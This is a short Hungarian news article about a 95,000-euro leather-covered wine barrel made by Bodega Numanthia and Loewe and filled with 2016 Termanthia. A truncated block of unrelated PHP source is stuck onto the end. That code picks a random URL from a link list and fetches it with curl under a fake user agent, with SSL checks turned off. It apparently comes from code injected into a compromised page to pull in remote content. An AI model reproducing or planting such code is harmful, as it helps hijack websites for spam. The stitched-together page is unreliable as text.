Luxusbort luxushordóba

A Bodega Numanthia és a spanyol divatcég, a Loewe közös projektbe fogtak: 95 ezer eurós bőr boroshordót álmodtak, amit 2016-os évjáratú Termanthiával töltenek majd meg. A két luxusóriás összefogásának eredménye nem lehetett más, mint egy gyönyörű és egyedi termék, ami a LVMH cégcsoporthoz tartozó Numanthia és Loewe jegyeit is hordozza. A 225 liter bort rejtő... Tovább..


A Bodega Numanthia és a spanyol divatcég, a Loewe közös projektbe fogtak: 95 ezer eurós bőr boroshordót álmodtak, amit 2016-os évjáratú Termanthiával töltenek majd meg.

A két luxusóriás összefogásának eredménye nem lehetett más, mint egy gyönyörű és egyedi termék, ami a LVMH cégcsoporthoz tartozó Numanthia és Loewe jegyeit is hordozza. A 225 liter bort rejtő hordó francia hordóból készült, kívülről pedig Loewe bőrrel vonták be. Aki még különlegesebb szolgáltatásra vágyik, annak a hét festési mozzanatból álló megmunkálás során a monogramját is elrejtik a bőrön, amit vérvörös, klasszikus barna és tengerészkék árnyalatokban lehet megrendelni.

A spanyol kézművességet ünneplő luxushordó csak az egyik különlegessége az együttműködésnek – a bor, amit a hordó rejt, nem kevésbé kivételes. A Numanthia gazdag, erőteljes vörös borairól ismert, és a Termanthiával sincs ez másképp.

A Tinta de Toro szőlőből készített 2016-os évjárat 200% francia tölgyben érlelődik, jelenleg is a Numanthia pincéiben pihen, összesen 20 hónapot tölt majd fahordóban. Az italt természetesen nem csak a hordóban, hanem 75 cl-es klasszikus kiszerelésben is lehet kapni, ami körülbelül 42 ezer forintért kerül majd értékesítésre.

Forrás: The Drinks Business


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>